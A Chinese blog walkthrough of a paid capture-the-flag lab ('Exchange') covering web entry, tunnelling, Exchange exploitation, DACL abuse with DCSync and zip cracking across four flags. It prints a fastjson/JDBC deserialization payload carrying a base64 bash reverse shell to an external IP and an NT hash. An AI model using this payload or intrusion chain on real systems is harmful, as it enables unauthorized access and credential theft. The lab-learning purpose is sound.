春秋云镜-内网极限挑战赛-Exchange

最新推荐文章于 2023-12-30 17:12:57 发布

Sugobet

最新推荐文章于 2023-12-30 17:12:57 发布

阅读量2.1k

点赞数 1

文章标签： windows Exchange 内网渗透域渗透横向移动

本文链接：https://blog.csdn.net/qq_54704239/article/details/130029237

版权

Exchange

看到奖品还有证书，还涉及oscp方面的东西，过来打打

感谢TryHackMe

Exchange 是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 Flag，分布于不同的靶机。

由于是付费的，时间就是金钱，为了节省点钱，我只好利用wp来进行半引导式渗透

借此来复习一下TryHackMe

(事实上我也看了其他几个房间的wp，得出的结论是thm教会了我太多太多，thm世界第一)

在这里插入图片描述

端口扫描

在这里插入图片描述

Web枚举 - 入口

进入8000，直接注册个账号

在这里插入图片描述

这里根据wp，存在一个可以让我们RCE的漏洞

但需要我们开启服务，由于我们没有公网ip，我们就借助thm的网络kali来帮助我们实现

如果java版本过高，请下载java8,然后为mysql_fake_server配置好java环境，否则会报错， https://repo.huaweicloud.com/java/jdk/

另外，这里需要提前下载ysoserial jar包，https://github.com/frohoff/ysoserial/releases

设置好config.json

在这里插入图片描述

thm的网络kali开启fake mysql server

在这里插入图片描述

把服务开起来之后就可以尝试利用了

/user/list?search=payload

payload:

{ "name": { "@type": "java.lang.AutoCloseable", "@type": "com.mysql.jdbc.JDBC4Connection", "hostToConnectTo": "攻击者IP", "portToConnectTo": 3306, "info": { "user": "yso_CommonsCollections6_bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zNC4yNTQuMTUxLjE2My84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}", "password": "pass", "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", "autoDeserialize": "true", "NUM_HOSTS": "1" } }

其中的base64是shellcode，需要改成自己的，然后再base64

然后将payload进行urlencode之后交付

在这里插入图片描述

成功getshell，并且拿到flag1

在这里插入图片描述

sshuttle搭建内网隧道

查看内网网段

在这里插入图片描述

首先使用ssh-keygen生成ssh key

在这里插入图片描述

将公钥改为authorized_keys丢到.ssh目录

在这里插入图片描述

将私钥下回攻击机，然后修改私钥权限

在这里插入图片描述

sshuttle搭建隧道

在这里插入图片描述

.2是dc，.26是win10

内网横向移动 - Exchange

.9有一个exchange

在这里插入图片描述

上exprolog

在这里插入图片描述

现在能够RCE

在这里插入图片描述

flag2

在这里插入图片描述

内网横向移动 - DACL-WriteDACL

这里为了省时间，就懒得开rdp进去传mimikataz之类的提取凭据操作了

直接wp快速拿到exchange的机器账户和zhangtong的 nt hash

0beff597ee3d7025627b2d9aa015bf4c

应该是通过bloodhound这类工具发现exchange机器账户对整个domain-object有writedacl权限

通过它来使用impacket的dacledit为我们已经获得的zhangtong赋予dcsync权限,然后进行dcsync获取DA账户的ntlm hash

psexec进dc

在这里插入图片描述

flag4

在这里插入图片描述

最后的flag

smbclient进.26的smb C$ share

在这里插入图片描述

在lumia的桌面下有个secret.zip, 但是有密码

由于thm的kali有上限时间，准备到时了，为了在kali关闭之前搞定，我选择直接wp:

PTH Exchange导出Lumia mailbox里面的全部邮件以及附件
item-0.eml，提示密码是手机号
导出的附件里面有一个csv，里面全是手机号

然后常规zip2john加john

然后出密码，查看flag.docx得到flag3

在这里插入图片描述

结束

其实这套机器整体并不难，除了入口点有点小坑之外，其他都还好，包括后面的横向移动和域渗透，事实上都非常简单，thm都是教过的非常全面的，其实跟thm的wreath有点相似。只是在这里，每一分每一秒都是钱，并且在最后，我的thm的kali也即将到期并且无法续期，我只好跟着wp的思路来极速完成这个机器

最后感谢TryHackMe的优质教程和房间，令我学的这么多

也感谢wp作者：小离-xiaoli写的writeup，才能令像我这种穷鬼能加速和跳过一部分

Sugobet

关注

1
点赞
踩
2

收藏

觉得还不错? 一键收藏
打赏
3
评论
春秋云镜-内网极限挑战赛-Exchange

看到奖品还有证书，还涉及oscp方面的东西，过来打打感谢TryHackMeExchange 是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 Flag，分布于不同的靶机。由于是付费的，时间就是金钱，为了节省点钱，我只好利用wp来进行半引导式渗透借此来复习一下TryHackMe
复制链接

扫一扫